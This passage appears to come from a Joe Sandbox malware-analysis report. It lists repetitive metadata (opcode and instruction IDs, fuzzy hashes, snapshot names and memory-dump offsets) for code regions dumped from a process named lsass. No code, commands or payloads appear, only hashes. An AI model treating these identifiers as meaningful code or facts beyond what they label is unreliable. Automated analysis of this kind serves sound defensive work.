                                        • Instruction ID: b2ef2b1b0e69b920456188e4e18509a1a1f21a4f1573df35f0c6ba27c9a1ceb8
                                        • Opcode Fuzzy Hash: 78773f2e1a43873d24b22663fa03778f27ef70323f4acee6c5f82ca2f39c1fa3
                                        • Instruction Fuzzy Hash: 7FF02B6190F3C04FCB1ADA3488288147FA0EF2320074A42EFC086CF1E3DA1CC889C711
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: I
                                        • API String ID: 0-3707901625
                                        • Opcode ID: 3fe98cea3e04a69ef9578f4526b9adb7e6a66e3c4c999b7b216b62d21fc39ece
                                        • Instruction ID: 30905013eb9b36e78f851c5b1cc9ec0c2f1b782498965dcfa99b30c8c72082f5
                                        • Opcode Fuzzy Hash: 3fe98cea3e04a69ef9578f4526b9adb7e6a66e3c4c999b7b216b62d21fc39ece
                                        • Instruction Fuzzy Hash: 9BE01AA154F7C44FDB1AEB74887A8447FA1AE6731178B41EEC186CF1B3E62E9849C701
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: I
                                        • API String ID: 0-3707901625
                                        • Opcode ID: 9092bbf3b6dccb8af45a484cf68103aab07fabbd82cb591250be62ed4457c616
                                        • Instruction ID: eaaebd97cac740c19e07075110cf3e1e2e00b795fccac820f5c25bd81faa2f6e
                                        • Opcode Fuzzy Hash: 9092bbf3b6dccb8af45a484cf68103aab07fabbd82cb591250be62ed4457c616
                                        • Instruction Fuzzy Hash: A2E0E56154E7D44FCB1AEA7488699487FA0AE6721078A40EEC186CB1B3E62A9849C702
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1908585632.00007FFD9BBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9bbf0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e008f0c86f70b0a67dbb79c1350439475bab62a58a33d32cf076998dcd22e421
                                        • Instruction ID: 57e355bbe2c6115d616eafb2731ef54fc0666e239c9adb070512e2b190bff2e6
                                        • Opcode Fuzzy Hash: e008f0c86f70b0a67dbb79c1350439475bab62a58a33d32cf076998dcd22e421
                                        • Instruction Fuzzy Hash: FF528D71E1DA598FDBA8EB58C8A1EA4B7E1FF6C354F0401E9A04DD32D2CA757980CB41
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 41e2b79797bd04ed9e6c459e888a1c41be8f309d7fc263e6067216700982cbc0
                                        • Instruction ID: 8e1d2e13b87a93ac38504346406e5e629947408b3a577a902a27f4486e8e96eb
                                        • Opcode Fuzzy Hash: 41e2b79797bd04ed9e6c459e888a1c41be8f309d7fc263e6067216700982cbc0
                                        • Instruction Fuzzy Hash: FAF1E030A19E598FEB58CF58C4E06B53BB1FF44301B5141BDC85ECB69ADA39E981CB81
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c3ba4dc8477824f70badcfe959aad5324ac4cc6825277346791f6a24e995db7
                                        • Instruction ID: b5d6bb1038ea489039d34c0614c810cdbf083441cd14eac4a5b3151e8fcf777f
                                        • Opcode Fuzzy Hash: 0c3ba4dc8477824f70badcfe959aad5324ac4cc6825277346791f6a24e995db7
                                        • Instruction Fuzzy Hash: B5D11330A0EF4A8FE379CB68D4A157577F1FF44300B1105BEC4AA876A6DE3AB9428741
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a7e1092fc584efe38c14995b16471745988859047ee08abf18296060ffe54813
                                        • Instruction ID: 8c8e89a93db228efb5cd509bd22c4a72409777ad381f6ef50e3529fbe0f68cb1
                                        • Opcode Fuzzy Hash: a7e1092fc584efe38c14995b16471745988859047ee08abf18296060ffe54813
                                        • Instruction Fuzzy Hash: D8B11731A0964D8FEB58EF68C855AE97BE0FF59310F1542BFD44EC72A2DA74A441CB40
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aeedf75175c85e67c2be81922713080b417612bf69910a8fce17a4809a2b14b6
                                        • Instruction ID: 97b858f5b87b6599e82a2d25f4e580482726b8fe9b1b3665d895935d689955f8
                                        • Opcode Fuzzy Hash: aeedf75175c85e67c2be81922713080b417612bf69910a8fce17a4809a2b14b6
                                        • Instruction Fuzzy Hash: 55C1DE3061AE5A8FEB19CF58C0E05B13BB1FF44301B5145BDC89A8B69BDA39E981CB41
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4f17f5fa815a9a831c677f9f673cdd54f1096e3c63caefc29ed1c71dd04a3386
                                        • Instruction ID: c1d14eedff9b97ac43d020a3d76a7895702adede20f72fb586fdbafccd323b24
                                        • Opcode Fuzzy Hash: 4f17f5fa815a9a831c677f9f673cdd54f1096e3c63caefc29ed1c71dd04a3386
                                        • Instruction Fuzzy Hash: 5EB1F77070AE4A4FE35ADB68C0A16B4B7A5FF48300F4541B9E05EC7AA7CB39B951C780
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f490c4d17bf0554b413f57799e75df38f51164155f093e06f5a53094f4ee16ad
                                        • Instruction ID: 88bf4031e5a9c877177d090d02e4259f46381f7d26c847f5f3e1812f7e61e809
                                        • Opcode Fuzzy Hash: f490c4d17bf0554b413f57799e75df38f51164155f093e06f5a53094f4ee16ad
                                        • Instruction Fuzzy Hash: 8F21FC12F0FE9B8AF77456E824710F866586F59334F1A0277D4BD890E3DC2E2A455383
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 070783fe2397cfe19b269e78cface614bf8c5eccca103a237e85a2b051e1bad3
                                        • Instruction ID: 0cc78407bba24b5227707044e1c6cbe88d848a3422b17e7ea7e5e2f4b2ace84f
                                        • Opcode Fuzzy Hash: 070783fe2397cfe19b269e78cface614bf8c5eccca103a237e85a2b051e1bad3
                                        • Instruction Fuzzy Hash: 8B816931B0EE494FE33A8BE894215797BE4EF45310B16057ED4AFC31A3DA3AB5028745
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4710cce34ed23134c25ba43fd8315856cc945090884964d97f8a86179dbafbe8
                                        • Instruction ID: 4e209ad216e5e86749507fd379d2c729f1dbaa0b0c170c691f783ed013238f3a
                                        • Opcode Fuzzy Hash: 4710cce34ed23134c25ba43fd8315856cc945090884964d97f8a86179dbafbe8
                                        • Instruction Fuzzy Hash: 56713B31B0ED8D4FE778DA5888669B537C4EF48310B150279D06EC7573DE39AE068382
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c19920367e65d237aaca5ec9f7bef2098ea5ec6427c6f28fcb019fbff0c2fc0e
                                        • Instruction ID: 2a897571ab7aaa49dc4ee3b7c0803f946a6d64eebc0c60bfc63380da1424a3c7
                                        • Opcode Fuzzy Hash: c19920367e65d237aaca5ec9f7bef2098ea5ec6427c6f28fcb019fbff0c2fc0e
                                        • Instruction Fuzzy Hash: D371A530E1ED4E8FE779DBA488646BC7BA4EF49300F1505B9D02ED71A6EE396941C702
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4bc08f1df6feadbfbb7558390cd4584fd1b261418228b53d70cd81170287d8b1
                                        • Instruction ID: 69c146bc887c9b78135d533fe5c5f406a5a8c0b5fe755b2d4a72e697242bb575
                                        • Opcode Fuzzy Hash: 4bc08f1df6feadbfbb7558390cd4584fd1b261418228b53d70cd81170287d8b1
                                        • Instruction Fuzzy Hash: CF516E21B19D1D4FE6A8FB6888AAAB973D2FF9C310F4501B9E41EC32E2DD356D418741
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 95cc725e76f599b8ecf1cd44ca0b39655fbb9e86d20c028c1a75bc04759e0c0c
                                        • Instruction ID: 1e3023b37c7186add5cd263697ca92f98d8d2eb5fe2456b68f94e1f305ba2f7e
                                        • Opcode Fuzzy Hash: 95cc725e76f599b8ecf1cd44ca0b39655fbb9e86d20c028c1a75bc04759e0c0c
                                        • Instruction Fuzzy Hash: E1415622B0C5590EE318F7BCA4A5AFE7781EF59339B0446FBE44DCB1E7CD14A8818280
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 106ddab84ebe57319ed5d2012563e6c3502c8b20a43e772d4709404776aea820
                                        • Instruction ID: 13788493888e99767b25a02060ac8a2b4a69ae29cf994d363370a63e47415c40
                                        • Opcode Fuzzy Hash: 106ddab84ebe57319ed5d2012563e6c3502c8b20a43e772d4709404776aea820
                                        • Instruction Fuzzy Hash: 65413926B0C5590EE318F7BCA4A59F97781EF5D339B0446BBE44DCB1E7DD14A881C284
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b311b8676a58fe5bf420bddb029af420e50172e8b198dd81c5a7f2e4022ef09e
                                        • Instruction ID: bf8d6542d553f5810804998f8ada818e9ee8ded79c32ac4a94d7e267a5eaf48c
                                        • Opcode Fuzzy Hash: b311b8676a58fe5bf420bddb029af420e50172e8b198dd81c5a7f2e4022ef09e
                                        • Instruction Fuzzy Hash: BD415531B0CD098FDB58EF28C495DA5B7E1FB68324B4441AAD45AC75A2DE31EC45CB81
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 89d12ba8345b0e17be08c577777729e0931f9d913f025e704b809dde03624b5c
                                        • Instruction ID: 5c543be1dc479db861910a3f5a35b512b6f802b1c09637223638eef748910f66
                                        • Opcode Fuzzy Hash: 89d12ba8345b0e17be08c577777729e0931f9d913f025e704b809dde03624b5c
                                        • Instruction Fuzzy Hash: 73414F3260DD098FDF98EB58D4A5DA573E1FFAC320B0401AAD05EC75A2DE35E845CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a674f3797fc98eafc300e6467eb9964b04200d35db98b912c35bf10a0f92cf88
                                        • Instruction ID: bb7e99a099525a581802920b718dbc5bf6773ad63f74db9a53f193260fd42d3c
                                        • Opcode Fuzzy Hash: a674f3797fc98eafc300e6467eb9964b04200d35db98b912c35bf10a0f92cf88
                                        • Instruction Fuzzy Hash: 0F31A331A0C9098FDB58EF2CC4A5D65B3E1FF68320B0442AAE45AC75A2DE31EC45CB81
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 35ba228337c6ac5ff0abb0324f5f5a1ca6ea18930529584efee23b520ce2053f
                                        • Instruction ID: 780511e8a010f782ad3528d997469e619b8ca720206af2663da7ead20c28a947
                                        • Opcode Fuzzy Hash: 35ba228337c6ac5ff0abb0324f5f5a1ca6ea18930529584efee23b520ce2053f
                                        • Instruction Fuzzy Hash: 65316F3160CD498FDB5CEB18C4A5EA573E1FFAD310B0406AAD05AC75A2DE35E845CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a2a5dc1d4249125d37608e0b607d44974d0caa960de2f5dd931ee0960727c4ef
                                        • Instruction ID: 548eef4ceab8e2e645edf673f8f6d03e74babe0b2712ba4f182ecf4617c8da90
                                        • Opcode Fuzzy Hash: a2a5dc1d4249125d37608e0b607d44974d0caa960de2f5dd931ee0960727c4ef
                                        • Instruction Fuzzy Hash: 0D31F526B1C9190FE768B76C6466AF973C1EF5C32AB4445BBE40EC71E7DD28AC418284
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ece63fd8834e68974415f99d4ee01362524f66e9fbb39f037e11d41e42816ad2
                                        • Instruction ID: 7b4c683f56da160057f7464b5088ffb8c8741fd2bbf4ad82a106b95f707256a1
                                        • Opcode Fuzzy Hash: ece63fd8834e68974415f99d4ee01362524f66e9fbb39f037e11d41e42816ad2
                                        • Instruction Fuzzy Hash: B6310342A0FFC94FD76246B81C28061BFA0EF5365030D42FFE0E4AA5E7D959AD098383
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc0caa7e940b296c731463ae89cd1755471f7bd4514f8f2ca668ad2687ac141c
                                        • Instruction ID: 12331988491dfd77cf4cc4d5cb3b940caedd6c1984877fb8fc2c4fa273c09806
                                        • Opcode Fuzzy Hash: cc0caa7e940b296c731463ae89cd1755471f7bd4514f8f2ca668ad2687ac141c
                                        • Instruction Fuzzy Hash: F8318631B0CD098FDB58EF28C4A5DA5B7E1FF68320B0445AAE05AC75A2DE35EC45CB81
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e4b8fc8b4762bfc8cf8f581ee6eb518fcb9387e6edc035f574669a56374d56ef
                                        • Instruction ID: d5272ea6a9f2b401d23750f827637aa4d15afa0f40eeb49d62829f5873ef67b2
                                        • Opcode Fuzzy Hash: e4b8fc8b4762bfc8cf8f581ee6eb518fcb9387e6edc035f574669a56374d56ef
                                        • Instruction Fuzzy Hash: 13314F3160CD498FDB6CEB18C4A5EA573E1FFAC310B0405AAD05AC75A2DE35E885CB81
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4a38ac8a095c755906e60d6c42a23a6b64416192fca638e411dc8b698957d6f
                                        • Instruction ID: 01084c9037e83b16af298c283c2331a210535a584b9afb92a06cbc49457778c8
                                        • Opcode Fuzzy Hash: d4a38ac8a095c755906e60d6c42a23a6b64416192fca638e411dc8b698957d6f
                                        • Instruction Fuzzy Hash: 38313A30A1ED0E8FEBA4DB9884625BD77F5FF44301F510076E02FC21A1DE3A6A408741
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eeb348208624ca5af34db1729f23db543915a770ea1cb36e53b20c9f2a4c4dd5
                                        • Instruction ID: 496f957b73e811004370d786302976526ec0ec5c4b42537814f09f4599586767
                                        • Opcode Fuzzy Hash: eeb348208624ca5af34db1729f23db543915a770ea1cb36e53b20c9f2a4c4dd5
                                        • Instruction Fuzzy Hash: 0A315D30A1EE4ECFEBA8DB9484615BD77B4FF48701F51017AD02DD61A2DB3A6E408745
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34c8da40faec077f56f286421578234f5890c2f573e30e3ae647ce5c0ec29b3c
                                        • Instruction ID: 7c60597881b88a0f706268f629c7beef1f634a3a23d210459072ba8f61b560db
                                        • Opcode Fuzzy Hash: 34c8da40faec077f56f286421578234f5890c2f573e30e3ae647ce5c0ec29b3c
                                        • Instruction Fuzzy Hash: 5F215E25B1891D0FF758F76C9469A7A72C2EF9C325F4501BEE40DC32E7DD24AC418281
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 23a2b4beb138c76a9e89eb363a86e23c3938aa22c73eb950cefac8528645c555
                                        • Instruction ID: 81ea7882b3bc33dbeeeef4713c56f8bfff0a60a03a7c16206fc72543bba0cd03
                                        • Opcode Fuzzy Hash: 23a2b4beb138c76a9e89eb363a86e23c3938aa22c73eb950cefac8528645c555
                                        • Instruction Fuzzy Hash: 16210521B0DF8D4FEB65D7E8A8622F87BD5EF45314F550179D0ADC31D3D929AA068340
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5fb9ff4172bc11ce7e3965d054f738bc2b963b6fff6c1bcadfecae2ea9db870f
                                        • Instruction ID: ebc10efea5b6949257855ffb18dd387eb726d7a97518ad3fdeea21c29cadb5e9
                                        • Opcode Fuzzy Hash: 5fb9ff4172bc11ce7e3965d054f738bc2b963b6fff6c1bcadfecae2ea9db870f
                                        • Instruction Fuzzy Hash: F431AE31B0DE0A5FDB54DBA8D4A19B8FBA2FF84310B554239D45ED3692DB24B912CB80
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c7f7db0ef04f610861b2fbd2797d1c5e152771951485161573423b31fd4dac81
                                        • Instruction ID: fa9576eec4d6eeacca7769a601b06357ed1ca18b84b308ba5b2896f3a65845b4
                                        • Opcode Fuzzy Hash: c7f7db0ef04f610861b2fbd2797d1c5e152771951485161573423b31fd4dac81
                                        • Instruction Fuzzy Hash: C7319D10A1EDDA4BE339836848745B47F75EF4130171946BED0AACB0E7D83DBA81C341
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1907131494.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9ba90000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 29fef8f86bbf9a350ac0f1ec4128e11d1e117bcb762432f8de5e7cc9ba27a418
                                        • Instruction ID: 08b0a0911856f64c9492e27a03bf273ee56e79f7105b0cd581cce5714708eecf
                                        • Opcode Fuzzy Hash: 29fef8f86bbf9a350ac0f1ec4128e11d1e117bcb762432f8de5e7cc9ba27a418
                                        • Instruction Fuzzy Hash: DA212736B0D28D8FE732E7A89C650DC3B60EF42365F0542B3D058DB1D3D9682646D798
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e641d1654c9fa0e9f89da8d5ca255998f96eca1c29ec70776937d888c7a04d23
                                        • Instruction ID: c1d6ee6d3f3f257f5e0e142ed93661ab515d7fa5811daf52e621b951c4701b97
                                        • Opcode Fuzzy Hash: e641d1654c9fa0e9f89da8d5ca255998f96eca1c29ec70776937d888c7a04d23
                                        • Instruction Fuzzy Hash: C9210321B0EE4E4FE358EBA888A47757391EF98314F0542BAD01DC72E3CE7D69498341
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 97d44b7594d28024286cc42bfd7a1a11ff16cc6102f3f7caa06b817875b80611
                                        • Instruction ID: 691e46dc8291761c3ff0f249405a00247b5d74ae06e4f356f19ae5eae9a42205
                                        • Opcode Fuzzy Hash: 97d44b7594d28024286cc42bfd7a1a11ff16cc6102f3f7caa06b817875b80611
                                        • Instruction Fuzzy Hash: B021E931E0591D9FDF98DB58C4A5AE9B7B1FF5C300F0001AEE01EE32A1CA35AA418B41
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cad00f4c5c58096e874aa930d4120083162faa5c2bc7fd9b293fe81caed7a300
                                        • Instruction ID: 8275acfe688128b16b995c69491e22436d057dcecb776aacd03d1295b8d9b435
                                        • Opcode Fuzzy Hash: cad00f4c5c58096e874aa930d4120083162faa5c2bc7fd9b293fe81caed7a300
                                        • Instruction Fuzzy Hash: 9E213D31E19D4E8FDB98DF98D8609ADB7B1FF58704F11017AD01AE72A1DA396D018B10
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a74c48af461becce34a7f6fe4e682b4255a269e450514248d278b1451dc61f3a
                                        • Instruction ID: b872bd8c4488dad3653f1105818bcce5b87fc58344f58ac4bfd9cba1351f9e6c
                                        • Opcode Fuzzy Hash: a74c48af461becce34a7f6fe4e682b4255a269e450514248d278b1451dc61f3a
                                        • Instruction Fuzzy Hash: D3112921A0EF8D4FE73586F44C255B97FE9EF56300F05017AD059D71A2DC6D6A068391
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1909908292.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7ffd9be80000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 83c444b43d895cfbd8dfec03d05658364919a4a95a7a952ec4d80d79919b0968
                                        • Instruction ID: 3f61c47dcf049320a70857ccd3a7890090ca44f3ad665d62a62f7b2907e600e8
                                        • Opcode Fuzzy Hash: 83c444b43d895cfbd8dfec03d05658364919a4a95a7a952ec4d80d79919b0968
                                        • Instruction Fuzzy Hash: 5C210170709E0A4BE399EB6890606A5B391FF54310F10827AD41EC3BE6DB39E9518784
                                        Memory Dump Source
